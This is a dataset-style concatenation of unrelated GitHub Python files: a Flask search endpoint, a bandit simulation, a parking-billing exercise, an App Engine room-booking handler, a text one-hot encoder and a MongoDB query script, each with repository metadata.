    collection.update_one({}, {"$set": {"searchInput": artist_name}}, upsert=True)
    # Execute the data.js script
    # NOTE(review): blocking call with no error check — the request waits for
    # the Node process and ignores a non-zero exit status; verify intended.
    subprocess.run(['node', 'data.js'])
    response = {
        'artistName': artist_name
    }
    return jsonify(response)
if __name__ == '__main__':
    # Use the PORT environment variable provided by Heroku, defaulting to 5000
    # locally. The previous `os.environ.get(5000)` passed an int as the key
    # (os.environ keys must be strings) and supplied no default, so it raised
    # TypeError at startup.
    port = int(os.environ.get('PORT', 5000))
app.run(host='0.0.0.0', port=port) | PetteriDev/spotify1 | search.py | search.py | py | 1,041 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pymongo.MongoClient",
"line_n... |
25169647710 | import numpy as np
import matplotlib.pyplot as plt
def main():
    """Multi-armed bandit simulation: estimate per-arm reward with incremental
    Q updates, average over repeated experiments, and plot the result."""
    N_bandits = 10
    # Each arm's threshold is a |N(0,1)| draw fixed for all experiments.
    bandits_probs = abs(np.random.normal(size=N_bandits))
    N_experiments = 100
    N_episodes = 100

    class Bandit:
        # Environment: arm `action` pays 1 when a fresh |N(0,1)| draw exceeds
        # its threshold, else 0.
        def __init__(self, bandits_probs):
            self.N = len(bandits_probs)
            self.probs = bandits_probs

        def get_reward(self, action):
            rand = abs(np.random.normal())
            reward = 1 if (rand > self.probs[action]) else 0
            return reward

    class Agent:
        # Tracks pull counts k and incremental mean reward estimates Q.
        def __init__(self, bandit):
            # np.int / np.float aliases were removed in NumPy 1.24; use the
            # builtin types instead.
            self.k = np.zeros(bandit.N, dtype=int)
            self.Q = np.zeros(bandit.N, dtype=float)

        def update_Q(self, action, reward):
            self.k[action] += 1
            # Incremental mean: Q += (r - Q) / k
            self.Q[action] += (reward - self.Q[action]) / self.k[action]

    def experiment(agent, bandit, N_episodes):
        # Pull every arm once per episode; keep the last reward seen per arm.
        reward_history = np.zeros(bandit.N)
        for i in range(N_episodes):
            for j in range(N_bandits):
                reward = bandit.get_reward(j)
                agent.update_Q(j, reward)
                reward_history[j] = reward
        print(reward_history.shape)
        return np.array(reward_history)

    # Average the (last-episode) rewards over independent experiments.
    reward_history_avg = np.zeros(N_bandits)
    for i in range(N_experiments):
        bandit = Bandit(bandits_probs)
        agent = Agent(bandit)
        reward_history = experiment(agent, bandit, N_episodes)
        reward_history_avg += reward_history
    reward_history_avg /= float(N_experiments)

    best_arm = np.argmax(reward_history_avg)
    print("Reward history avg ={}".format(reward_history_avg))
    print("The Best arm to choose after {} experiments is {} with a reward of {}".format(N_experiments, best_arm, reward_history_avg.max()))
    plt.plot(reward_history_avg)
    plt.show()
main() | rohilrg/Online-Learning-Bandits-Reinforcement-Learning | IU.py | IU.py | py | 1,870 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.random.normal",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "numpy.random.normal",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.random"... |
73952796902 | # PARKING MANAGEMENT #
#
import datetime
#
# For insurance purposes, the management of an office building is required to
# maintain, at all time, an accurate list of all the vehicles in the dedicated
# parking. In addition, for billing the different companies, the office
# building management wants to record occupation of the parking at different
# times and automatically emit bills to each specific companies.
#
# You are tasked with completing the series of functions below that fill the
# need of the office building parking management. You are allowed (and
# encouraged) to create additional, intermediate functions.
#
# The main data structure that your suite of function handles is a record of
# entrances and exits. A sample is given below. It consist of a pair of lists
# of tuples. The first list gives the timestamps and license plate number of
# vehicles entering the parking, the second exiting.
#
# DO NOT MODIFY CONSTANTS
PARKING_DATA_SAMPLE = ([
(datetime.datetime(2017, 12, 12, 7, 13, 44, 0), 'LR10GHT'),
(datetime.datetime(2017, 12, 12, 7, 13, 48, 0), 'LC11FBF'),
(datetime.datetime(2017, 12, 12, 7, 13, 59, 0), 'LR10ZPP'),
(datetime.datetime(2017, 12, 12, 7, 15, 2, 0), 'LJ65OSN'),
(datetime.datetime(2017, 12, 12, 7, 15, 22, 0), 'LA63EWH'),
(datetime.datetime(2017, 12, 12, 13, 1, 42, 0), 'LC11FBF')
], [(datetime.datetime(2017, 12, 12, 12, 13, 1, 0), 'LC11FBF'),
(datetime.datetime(2017, 12, 12, 16, 42, 10, 0), 'LR10ZPP'),
(datetime.datetime(2017, 12, 12, 17, 2, 41, 0), 'LR10GHT'),
(datetime.datetime(2017, 12, 12, 17, 2, 58, 0), 'LA63EWH'),
(datetime.datetime(2017, 12, 12, 17, 4, 3, 0), 'LJ65OSN'),
(datetime.datetime(2017, 12, 12, 17, 10, 21, 0), 'LC11FBF')])
#
# A secondary data structure includes billing information. It is a dictionary
# that maps company names to a list of registered license plates.
#
# DO NOT MODIFY CONSTANTS
COMPANY_REGISTRATIONS_SAMPLE = {
'Shire Tobacco Inc.': ['LR10GHT', 'LA63EWH'],
'Rohan Equestrian Equipments': [],
'Moria Construction Hardware': ['LC11FBF', 'LS66XKE', 'LR10ZPP', 'LJ65OSN']
}
def register_car(registration, company, plate):
    """
    Registers a new car.

    NOTE: this function does not modify the registration dictionary that is
    given; it creates and returns a new dictionary (the original was mutated
    in place, violating this contract).
    NOTE: this function does not introduce duplicates in the registration
    system. If the car is already registered with the given company, an
    identical registration is returned. If the car is registered with a
    different company, that first registration is removed.
    NOTE: if the company is not listed in the dictionary, it is not
    introduced; an otherwise identical registration is returned.

    E.g., register_car({'Stark Industries': ['IRNMN']}, 'Stark Industries',
    'JARVIS')
    is {'Stark Industries': ['IRNMN', 'JARVIS']}
    E.g., register_car({'Stark Industries': ['IRNMN']}, 'Wayne Enterprises',
    'IMBTMN')
    is {'Stark Industries': ['IRNMN']}

    :param registration: preexisting registration information
    :param company: company to register the car for
    :param plate: license plate of the car to register
    :return: new registration information dictionary with added registration
    :rtype: dict
    """
    # Deep-ish copy: new dict with new lists so the input is never mutated.
    new_registration = {key: list(plates) for key, plates in registration.items()}
    # Drop any registration of this plate with a *different* company.
    for other_company, plates in new_registration.items():
        if other_company != company and plate in plates:
            plates.remove(plate)
    # Register with the requested company only if it is a known company and
    # the plate is not already listed there (keeps the result duplicate-free
    # and identical when the registration already exists).
    if company in new_registration and plate not in new_registration[company]:
        new_registration[company].append(plate)
    return new_registration
# Ad-hoc smoke calls left by the author; return values are discarded.
register_car({'Stark Industries': ['IRNMN']}, 'Stark Industries', 'JARVIS')
register_car({'Stark Industries': ['IRNMN']}, 'Wayne Enterprises', 'IMBTMN')
register_car({'X': []}, 'X', 'A')
register_car({'X': [], 'Y': ['A']}, 'X', 'A')
register_car({'Stark Industries': ['IRNMN']}, 'Stark Industries', 'JARVIS')
def occupancy(parking_data, cutoff_time=None):
    """
    Computes the occupancy of the parking at a given time. If no time is
    provided, check the current occupancy.

    A vehicle is present at ``cutoff_time`` when it has an entrance at or
    before that time and no matching exit at or before that time.

    E.g.,
    data = ([(datetime.datetime(2017, 12, 12, 7, 13, 44, 0), 'LR10GHT')], [])
    occupancy(data, cutoff_time=datetime.datetime(2017, 12, 12, 7, 13, 45, 0))
    is ['LR10GHT']
    E.g.,
    data = ([(datetime.datetime(2017, 12, 12, 7, 13, 44, 0), 'LR10GHT')], [])
    occupancy(data, cutoff_time=datetime.datetime(2017, 12, 12, 7, 13, 43, 0))
    is []

    :param parking_data: tuple of lists of timestamped arrival and departure
        information including license plate. See sample above.
    :param cutoff_time: time (as a datetime.datetime object) at which to
        check for occupancy. If no time is provided, use now.
    :return: list of cars present in the parking at the given time.
    :rtype: list
    """
    if cutoff_time is None:
        cutoff_time = datetime.datetime.now()
    entries, exits = parking_data
    present = []
    for entry_time, plate in entries:
        # Entrances after the requested time cannot contribute.
        if entry_time > cutoff_time:
            continue
        # Earliest exit of this vehicle at or after this entrance, if any
        # (handles a plate entering and exiting several times).
        exit_time = min(
            (t for t, p in exits if p == plate and t >= entry_time),
            default=None)
        still_inside = exit_time is None or exit_time > cutoff_time
        if still_inside and plate not in present:
            present.append(plate)
    return present
# Smoke checks: the year-2000 cutoff precedes the 2017 entrance, so both
# calls should yield an empty occupancy list; results are discarded.
data = ([(datetime.datetime(2017, 12, 12, 7, 13, 44, 0), 'LR10GHT')], [])
cutoff_time = datetime.datetime(2000, 1, 3, 12, 0)
occupancy(data, cutoff_time)
data = ([(datetime.datetime(2017, 12, 12, 7, 13, 44, 0), 'LR10GHT')], [])
cutoff_time = datetime.datetime(2000, 1, 3, 12, 0)
occupancy(data, cutoff_time)
def company_bill(parking_data, company_registration, company, t_start, t_end):
    """
    Computes the total, cumulated time in seconds, ignoring milliseconds,
    that cars registered with a given company stayed in the parking during
    the interval between t_start and t_end.

    Each stay is clamped to the [t_start, t_end] billing window. A vehicle
    with an entrance but no later exit is billed up to t_end.

    E.g.,
    parking_data = (
        [(datetime.datetime(2017, 12, 12, 7, 13, 44, 0), 'LR10GHT')],
        [(datetime.datetime(2017, 12, 12, 7, 13, 45, 0), 'LR10GHT')]
    )
    company_registration = {'Shire Tobacco Inc.': ['LR10GHT']}
    company_bill(parking_data, company_registration,
                 'Shire Tobacco Inc.', ..., ...)
    is 1

    :param parking_data: see sample above
    :param company_registration: see sample above
    :param company: name of the company to compute billing for
    :param t_start: start of the billing interval
    :param t_end: end of the billing interval
    :return: cumulated number of seconds of car park occupancy
    :rtype: float | int
    """
    entries, exits = parking_data
    total_seconds = 0
    # Unknown company -> no registered plates -> bill of 0.
    for plate in company_registration.get(company, []):
        plate_exits = sorted(t for t, p in exits if p == plate)
        for entry_time, entry_plate in entries:
            if entry_plate != plate:
                continue
            # Earliest exit at or after this entrance; still parked -> t_end.
            exit_time = min((t for t in plate_exits if t >= entry_time),
                            default=t_end)
            billed_start = max(entry_time, t_start)
            billed_end = min(exit_time, t_end)
            if billed_end > billed_start:
                # total_seconds() covers multi-day stays (timedelta.seconds
                # would silently drop whole days); int() ignores milliseconds.
                total_seconds += int((billed_end - billed_start).total_seconds())
    return total_seconds
# Ad-hoc smoke calls; billing windows start at/after the stays, results are
# discarded.
parking_data = ([(datetime.datetime(2000, 1, 1, 12, 0), 'LR10GHT')],
                [(datetime.datetime(2000, 1, 2, 12, 0), 'LR10GHT')])
start_time = datetime.datetime(2000, 1, 3, 12, 0)
end_time = datetime.datetime(2000, 1, 3, 12, 0)
company_registration = {'Shire Tobacco Inc.': ['LR10GHT']}
company_bill(parking_data, company_registration, 'Shire Tobacco Inc.', start_time, end_time)
parking_data = ([(datetime.datetime(2000, 1, 1, 12, 0), 'LR10GHT')],
                [(datetime.datetime(2000, 1, 2, 12, 0), 'LR10GHT')])
start_time = datetime.datetime(2000, 1, 3, 12, 0)
end_time = datetime.datetime(2000, 1, 3, 12, 0)
company_registration = {'Shire Tobacco Inc.': ['LR10GHT']}
company_bill(parking_data, company_registration, 'Shire Tobacco Inc.', start_time, end_time)
parking_data = ([(datetime.datetime(2000, 1, 1, 12, 0), 'LR10GHT')], [])
start_time = datetime.datetime(2000, 1, 3, 12, 0)
end_time = datetime.datetime(2000, 1, 3, 12, 0)
company_registration = {'Shire Tobacco Inc.': ['LR10GHT']}
company_bill(parking_data, company_registration, 'Shire Tobacco Inc.', start_time, end_time)
parking_data = ([(datetime.datetime(2000, 1, 1, 12, 0), 'LR10GHT'), (datetime.datetime(2000, 1, 2, 12, 0), 'LR10GHT'), (datetime.datetime(2000, 1, 3, 12, 0), 'LR10GHT')], [(datetime.datetime(2000, 1, 1, 12, 1), 'LR10GHT'), (datetime.datetime(2000, 1, 2, 12, 1), 'LR10GHT'), (datetime.datetime(2000, 1, 3, 12, 1), 'LR10GHT')])
start_time = datetime.datetime(2000, 1, 3, 12, 0)
end_time = datetime.datetime(2000, 1, 3, 12, 0)
company_registration = {'Shire Tobacco Inc.': ['LR10GHT']}
company_bill(parking_data, company_registration, 'Shire Tobacco Inc.', start_time, end_time)
| ashokpanigrahi88/ashokpython | Exercises/Pre-Programming/parking_management.py | parking_management.py | py | 10,446 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "datetime.dateti... |
12834655399 | import webapp2
import jinja2
import os
import datetime
from google.appengine.api import users
from google.appengine.ext import ndb
from model import RoomModel, BookingModel
# Jinja2 environment rooted at this file's directory, with autoescaping on.
JINJA_ENVIRONMENT = jinja2.Environment(
    loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
    extensions=['jinja2.ext.autoescape'],
    autoescape=True
)
class AddRoom(webapp2.RequestHandler):
    """Add-room page: GET renders the form, POST persists a new room."""

    def get(self):
        """Render the add-room form, or a login prompt when not signed in."""
        self.response.headers['Content-Type'] = 'text/html'
        user = users.get_current_user()
        if user:
            main_header = 'Please Add Room Information Below'
            login_logout = 'Logout'
            login_logout_url = users.create_logout_url(self.request.uri)
        else:
            main_header = 'Please Login to Access This Page..!!'
            login_logout = 'Login'
            login_logout_url = users.create_login_url(self.request.uri)
        template_values = {
            'main_header': main_header,
            'login_logout': login_logout,
            'login_logout_url': login_logout_url,
            'user': user
        }
        template = JINJA_ENVIRONMENT.get_template('addRoom.html')
        self.response.write(template.render(template_values))

    def post(self):
        """Create a RoomModel keyed by the room name; reject duplicates.

        On success the client is redirected to '/'; on a duplicate name the
        form is re-rendered with an error message.
        """
        # (Removed leftover debug print "Post method of booking".)
        self.response.headers['Content-Type'] = 'text/html'
        user = users.get_current_user()
        error_message = ''
        if user:
            main_header = 'Please Add Room Information Below'
            login_logout = 'Logout'
            login_logout_url = users.create_logout_url(self.request.uri)
            user_given_room_name = self.request.get("room_name")
            # The room name doubles as the ndb key, so an existing entity
            # means the room was already created.
            my_model_key = ndb.Key('RoomModel', user_given_room_name)
            my_room = my_model_key.get()
            if my_room:
                error_message = 'Room Already exists ! Please use add booking option for booking'
            else:
                my_room = RoomModel(id=user_given_room_name)
                my_room.roomName = user_given_room_name
                my_room.createdBy = user.email()
                my_room.put()
                self.redirect('/')
        else:
            main_header = 'Please Login to Access This Page..!!'
            login_logout = 'Login'
            login_logout_url = users.create_login_url(self.request.uri)
        template_values = {
            'main_header': main_header,
            'login_logout': login_logout,
            'login_logout_url': login_logout_url,
            'user': user,
            'error_message': error_message
        }
        template = JINJA_ENVIRONMENT.get_template('addRoom.html')
        self.response.write(template.render(template_values))
class AddBooking(webapp2.RequestHandler):
    """Handles POSTs that add a booking to an existing room entity."""

    def post(self):
        """Validate and persist a booking for the room named in the request.

        Rejects bookings whose start is not before their end, bookings in
        the past, duplicate booking ids, and time ranges overlapping an
        existing booking; on any rejection the form is re-rendered with an
        error message, on success the client is redirected to '/'.
        """
        self.response.headers['Content-Type'] = 'text/html'
        user = users.get_current_user()
        error_message = ''
        user_given_room_name = self.request.get("room_name")
        if user:
            main_header = 'Please Add Room Information Below'
            login_logout = 'Logout'
            login_logout_url = users.create_logout_url(self.request.uri)
            page_id = self.request.get("page_id")
            if page_id == "addBooking":
                user_given_room_name = self.request.get("room_name")
                # Room name is the entity key (see AddRoom.post).
                user_room_key = ndb.Key('RoomModel', user_given_room_name)
                room_ndb_object = user_room_key.get()
                existing_bookings = room_ndb_object.booking
                date_time_format = "%Y-%m-%dT%H:%M"
                # Read user inputs
                new_start_date = self.request.get("startDate")
                new_start_time = self.request.get("startTime")
                new_end_date = self.request.get("endDate")
                new_end_time = self.request.get("endTime")
                new_booking_id = self.request.get("bookingId")
                # Convert user input to datetime objects
                new_start_date_time = datetime.datetime.strptime(new_start_date + "T" + new_start_time,
                                                                 date_time_format)
                new_end_date_time = datetime.datetime.strptime(new_end_date+"T"+new_end_time, date_time_format)
                add_booking_flag = True
                print(new_start_date_time)
                print(new_end_date_time)
                # Reject empty or inverted time ranges.
                # NOTE(review): the message reads "Start Time should always be
                # greater than End Time" but the check enforces the opposite
                # (end must be after start) — confirm the intended wording.
                if new_start_date_time >= new_end_date_time:
                    add_booking_flag = False
                    error_message = "Start Time should always be greater than End Time"
                # Reject bookings starting in the past (server clock).
                if add_booking_flag and (new_start_date_time < datetime.datetime.now()):
                    add_booking_flag = False
                    error_message = "No past bookings allowed. Current time is : {0} GMT(No daylight savings)".format(
                        datetime.datetime.now().strftime("%Y-%m-%d %H:%M"))
                # Check for add_booking_flag which will be false if any of above conditions are true.!
                if add_booking_flag is True:
                    for each_booking in existing_bookings:
                        existing_start_date_time = each_booking.startTime
                        existing_end_date_time = each_booking.endTime
                        existing_booking_id = each_booking.bookingId
                        if existing_booking_id == new_booking_id:
                            add_booking_flag = False
                            error_message = "Please select unique Booking id. Booking already exists"
                            break
                        # Inclusive interval-intersection test.
                        # NOTE(review): bookings that merely touch at an
                        # endpoint are treated as overlapping — confirm.
                        if new_start_date_time <= existing_end_date_time and \
                                new_end_date_time >= existing_start_date_time:
                            add_booking_flag = False
                            error_message = "Booking Overlaps, " \
                                            "Please view bookings and make new non-overlapping booking"
                            break
                    if add_booking_flag:
                        # All checks passed; append and persist to ndb.
                        new_booking = BookingModel(startTime=new_start_date_time,
                                                   endTime=new_end_date_time,
                                                   bookingId=new_booking_id,
                                                   userCreated=user.email()
                                                   )  # type: BookingModel
                        room_ndb_object.booking.append(new_booking)
                        room_ndb_object.put()
                        self.redirect('/')
        else:
            main_header = 'Please Login to Access This Page..!!'
            login_logout = 'Login'
            login_logout_url = users.create_login_url(self.request.uri)
        template_values = {
            'main_header': main_header,
            'login_logout': login_logout,
            'login_logout_url': login_logout_url,
            'user': user,
            'error_message': error_message,
            'room_name': user_given_room_name
        }
        template = JINJA_ENVIRONMENT.get_template('addBooking.html')
        self.response.write(template.render(template_values))
| hari-ar/cc_assignment2 | add.py | add.py | py | 7,428 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "jinja2.Environment",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "jinja2.FileSystemLoader",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
... |
3460040213 | import numpy as np
import pandas as pd
import sys
import os
import logging
import math
NUMBER_CHAR = 1000  # fixed number of characters kept per abstract (row count of the one-hot matrix)
def get_logger(name):
    """Return a logger named *name* at INFO level with one console handler.

    Records are formatted as
    ``time - [LEVEL] - name - (file).func(line) - message``. A previously
    present (commented-out) file handler was never attached.
    """
    record_format = ("%(asctime)s - [%(levelname)s] - %(name)s - "
                     "(%(filename)s).%(funcName)s(%(lineno)d) - %(message)s")
    console = logging.StreamHandler()
    console.setLevel(logging.INFO)
    console.setFormatter(logging.Formatter(record_format))
    configured = logging.getLogger(name)
    configured.setLevel(logging.INFO)
    configured.addHandler(console)
    return configured
def get_names():
    """Map logical file roles to paths under the script directory.

    Relies on the module-level ``root_dir`` set in the ``__main__`` guard.
    """
    base = root_dir
    return {
        'input_test_file': base + "dissertation_test.csv",
        'input_file': base + "dissertation.csv",
        'all_set_char_file': base + "all_set_char.txt",
        'dict_oecds_file': base + "dict_oecds.csv",
    }
def get_column(input_file, column):
    """Load *input_file* as CSV and return the selected column(s).

    :param input_file: path to a CSV file readable by pandas
    :param column: a column label (returns a Series) or a list of labels
        (returns a DataFrame)
    """
    return pd.read_csv(input_file)[column]
def show_plot(distribution):
    """Render *distribution* (bucket -> frequency) as a bar chart.

    Blocks until the matplotlib window is closed.

    :param distribution: dict mapping x values to bar heights
    """
    import matplotlib.pyplot as plt
    fig, ax = plt.subplots()
    # `Figure.canvas.set_window_title` was deprecated in matplotlib 3.4 and
    # removed in 3.6; the figure manager now owns the window title.
    fig.canvas.manager.set_window_title('Диаграмма количества ключевых слов')
    ax.bar(distribution.keys(), distribution.values())
    ax.set_facecolor('seashell')
    fig.set_facecolor('floralwhite')
    fig.set_figwidth(12)   # figure width
    fig.set_figheight(6)   # figure height
    ax.set_xlabel('Длинна текста')
    ax.set_ylabel('Частота использования ключевых слов')
    plt.show()
def len_split(x) -> int:
    """Number of ', '-separated tokens in *x*; 0 for non-strings (e.g. NaN)."""
    try:
        tokens = x.split(sep=', ')
    except AttributeError:
        # Non-string rows (NaN floats, None) have no split() method.
        return 0
    return len(tokens)
def show_distribution(df_abstract, operatinon=len):
    """Histogram the values of *operatinon* over *df_abstract* and plot it.

    :param df_abstract: iterable of texts (may contain NaN rows)
    :param operatinon: callable mapping an item to a hashable bucket
        (e.g. ``len`` or ``len_split``); name kept for interface
        compatibility with existing callers
    """
    distribution = {}
    for i, text in enumerate(df_abstract):
        try:
            bucket = operatinon(text)
        except TypeError:
            # NaN / non-text rows: report and skip. The original fell
            # through here, crashing with an unbound variable on the first
            # bad row and re-counting the previous bucket otherwise.
            print(i, text)
            continue
        if bucket in distribution:
            distribution[bucket] += 1
        else:
            distribution[bucket] = 1
    print(max(distribution.keys()))
    print(distribution)
    show_plot(distribution)
def create_char_dict(set_char_filename, df_abstract):
    """Collect the characters used across *df_abstract* and dump them to a file.

    Writes one ``<codepoint> - <char>`` line per character to
    *set_char_filename* and returns the sorted character list.

    NOTE(review): ``str(all_set_char)`` stringifies the *repr* of the set,
    so the final alphabet is built from the characters of that repr
    (including ``{``, ``'`` and ``,``) rather than from the set elements
    directly — confirm this is intended.
    """
    all_set_char = set()
    print(len(df_abstract))
    for text in df_abstract:
        try:
            all_set_char = all_set_char.union(set(text))
            # all_set_char = all_set_char.union(set(text.split()))
        except TypeError:
            # Non-iterable rows (e.g. NaN) are skipped.
            continue
        except AttributeError:
            continue
    all_set_char = sorted(list(set(str(all_set_char).lower())))
    str_char = ''
    for char in all_set_char:
        str_char += f'{ord(char)} - ' + char + '\n'  # chr(0x1f)
    # str_char = str_char[:-1]
    with open(set_char_filename, 'w') as f:
        f.write(str_char)
    # print(all_set_char)
    # print(f"len(all_set_char): {len(all_set_char)}")
    return all_set_char
def prepare_data(tuple_char, abstract):
    """
    Create list with index char in tuple_char.

    Maps every character of *abstract* (lower-cased) to its position in the
    base alphabet ``tuple_char[0]``; superscript digits collapse to index
    ``len(tuple_char)`` and subscripts to ``len(tuple_char) + 1``; anything
    else (including the Greek letters in ``tuple_char[3]``) becomes ``None``.

    NOTE(review): ``len(tuple_char)`` is 4, so the superscript/subscript
    buckets (4 and 5) collide with alphabet positions 4 and 5 ('$' and '%')
    given ``quantization_abstract``'s one-hot width — confirm whether the
    intended offsets were ``len(tuple_char[0])`` and ``len(tuple_char[0]) + 1``.

    :param tuple_char: character vocabulary, see ``get_tuple_char``
    :param abstract: text to index; non-strings are logged and yield []
    :return: indexes, truncated to the first 1000 characters
    """
    indexes = []
    try:
        for char in abstract.lower():
            try:
                ind = tuple_char[0].index(char)
            except ValueError:
                if char in tuple_char[1]:
                    ind = len(tuple_char)
                elif char in tuple_char[2]:
                    ind = len(tuple_char) + 1
                else:
                    # logger.info(f'special symbol: {char}')
                    ind = None
            indexes.append(ind)
    except AttributeError:
        # NaN / non-string rows have no .lower(); return an empty index list.
        logger.warning(f'NaN in abstract: {abstract}')
        pass
    if len(indexes) > NUMBER_CHAR:
        indexes = indexes[:1000]  # literal 1000 == NUMBER_CHAR
    # print(indexes)
    # print(len(indexes))
    return indexes
def quantization_abstract(indexes, tuple_char):
    """One-hot encode *indexes* into a (NUMBER_CHAR, vocab-width) bool matrix.

    :param indexes: per-character vocabulary indices (``None`` = unmapped)
    :param tuple_char: character vocabulary, see ``get_tuple_char``
    :return: boolean array; row i has True at column ``indexes[i]``
    """
    quantum_abstract = np.zeros((NUMBER_CHAR, (len(tuple_char[0]) + len(tuple_char) - 1)), bool)
    for i, ind in enumerate(indexes):
        # `if ind:` would silently drop index 0 (the space character, first
        # entry of tuple_char[0]); only None marks an unmapped character.
        if ind is not None:
            quantum_abstract[i][ind] = True
    return quantum_abstract
def quantization_oecds(oecds, dict_oecds):
    """Multi-hot encode a ', '-separated OECD category string.

    :param oecds: string of categories, e.g. ``'Physics, Chemistry'``
    :param dict_oecds: mapping of lower-cased category -> column index
    :return: boolean vector with True at each listed category's index
    :raises ValueError: if *oecds* is not a string (NaN row)
    """
    quantum_oecds = np.zeros(len(dict_oecds), bool)
    try:
        splited_oecds = oecds.split(sep=', ')
    except AttributeError:
        logger.warning(f'NaN in oecds')
        # The original `raise 'NaN in oecds'` raised a str, which is itself
        # a TypeError in Python 3; raise a proper exception instead.
        raise ValueError('NaN in oecds')
    for oecd in splited_oecds:
        quantum_oecds[dict_oecds[oecd.lower()]] = True
    return quantum_oecds
def get_tuple_char():
    """
    Tuple_char is tuple ((alphabetical), (upper), (lower), (latin))
    alphabetical - is real index. (tuple_char.index(char))
    (upper), (lower), (latin) - len(tuple_char), len(tuple_char) + 1,
    len(tuple_char) + 2.

    Sub-tuples: base ASCII + Cyrillic alphabet, superscript digits/signs,
    subscript digits/signs, Greek letters ("latin" in the original naming).
    See the NOTE(review) on ``prepare_data`` about the bucket offsets.

    :return: the character vocabulary tuple
    """
    tuple_char = (
        (' ', '!', '"', '#', '$', '%', '&', "'", '(', ')', '*', '+', ',', '-', '.', '/',
         '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', ';', '<', '=', '>',
         '?', '@', '[', '\\', ']', '^', '_', '`',
         'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
         'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
         '{', '|', '}', '~',
         'а', 'б', 'в', 'г', 'д', 'е', 'ж', 'з', 'и', 'й', 'к', 'л', 'м', 'н', 'о',
         'п', 'р', 'с', 'т', 'у', 'ф', 'х', 'ц', 'ч', 'ш', 'щ', 'ъ', 'ы', 'ь', 'э',
         'ю', 'я', 'ё'),
        ('⁰', '¹', '²', '³', '⁴', '⁵', '⁶', '⁷', '⁸', '⁹', '⁺', '⁻', '⁼', '⁽', '⁾', 'ⁿ'),
        ('₀', '₁', '₂', '₃', '₄', '₅', '₆', '₇', '₈', '₉', '₊', '₋', '₌', '₍', '₎', 'ₒ', 'ₓ', 'ₙ'),
        ('α', 'β', 'γ', 'δ', 'ε', 'ζ', 'η', 'θ', 'ι', 'κ', 'λ', 'μ', 'ν', 'ξ', 'ο',
         'π', 'ρ', 'ς', 'σ', 'τ', 'φ', 'χ', 'ψ', 'ω')
    )
    return tuple_char
def create_dict_oecds(df_oecds, dict_oecds_file):
    """Build the OECD-category index and persist it as a CSV.

    Collects the lower-cased, ', '-separated categories from *df_oecds*,
    writes the sorted unique list to *dict_oecds_file*, and returns a
    mapping category -> column index.
    """
    unique_oecds = set()
    for raw in df_oecds:
        try:
            unique_oecds.update(item.lower() for item in raw.split(sep=', '))
        except AttributeError:
            # NaN rows have no .split(); skip them with a warning.
            logger.warning(f'NaN in oecds')
    list_oecd = sorted(unique_oecds)
    print(list_oecd)
    print(len(list_oecd))
    df_dict_oecds = pd.DataFrame()
    df_dict_oecds.index.name = 'index'
    df_dict_oecds['uniq_oecds'] = list_oecd
    df_dict_oecds.to_csv(dict_oecds_file)
    logger.info(f"Done!")
    return {oecd: position for position, oecd in enumerate(list_oecd)}
def main():
    """Load the dissertation CSV and one-hot encode abstracts and OECD tags."""
    names = get_names()
    # df_abstract_oecds = get_column(names['input_test_file'], ['abstract', 'oecds.0'])
    df_abstract_oecds = get_column(names['input_file'], ['abstract', 'oecds.0'])
    tuple_char = get_tuple_char()
    quantum_abstracts = []
    quantum_oecds = []
    len_df_abstract = len(df_abstract_oecds['abstract'])
    dict_oecds = create_dict_oecds(df_abstract_oecds['oecds.0'], names['dict_oecds_file'])
    for i, (abstract, oecds) in enumerate(zip(df_abstract_oecds['abstract'], df_abstract_oecds['oecds.0'])):
        if i % 1000 == 0:
            print(f'{i}/{len_df_abstract}')
        # Skip rows where either column is missing. `x is np.NaN` relied on
        # NaN object identity and on `np.NaN`, which was removed in
        # NumPy 2.0; pd.isna detects any missing value.
        if pd.isna(abstract) or pd.isna(oecds):
            continue
        indexes = prepare_data(tuple_char, abstract)
        quantum_abstracts.append(quantization_abstract(indexes, tuple_char))
        quantum_oecds.append(quantization_oecds(oecds, dict_oecds))
if __name__ == '__main__':
    # root_dir and logger are module globals used by the functions above;
    # they only exist when this file runs as a script (not when imported).
    root_dir = os.path.split(sys.argv[0])[0] + '/'
    logger = get_logger(__name__)
    main()
| Dif13/Thesis_clustering | prepare_abstract.py | prepare_abstract.py | py | 8,101 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.FileHandler",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "logging.WARNING",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "logging.Formatter",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "logging.St... |
42910154667 | import pymongo
from pymongo import MongoClient
import time
import pprint
# Connect to the local MongoDB instance and select the tweets collection.
client = MongoClient('localhost', 27017)
db = client['sahamyab']
series_collection = db['tweets']
### Adding index to field
series_collection.create_index([("mediaContentType", pymongo.DESCENDING), ("parentId", pymongo.DESCENDING)])
start_time = time.time()
# Project only senderName for JPEG tweets that are replies (have a parentId).
res = series_collection.find({
    '$and': [
        {'mediaContentType': 'image/jpeg'}, {'parentId': {'$exists': True}}
    ]}, {"senderName": 1, '_id': 0})
end_time = time.time()
delta_time = end_time - start_time
# NOTE(review): find() returns a lazy cursor, so this interval measures only
# cursor construction; the query actually executes during the loop below.
print('run time:', delta_time)
lis = []
for i in res:
    lis.append(i['senderName'])
    pprint.pprint(i)
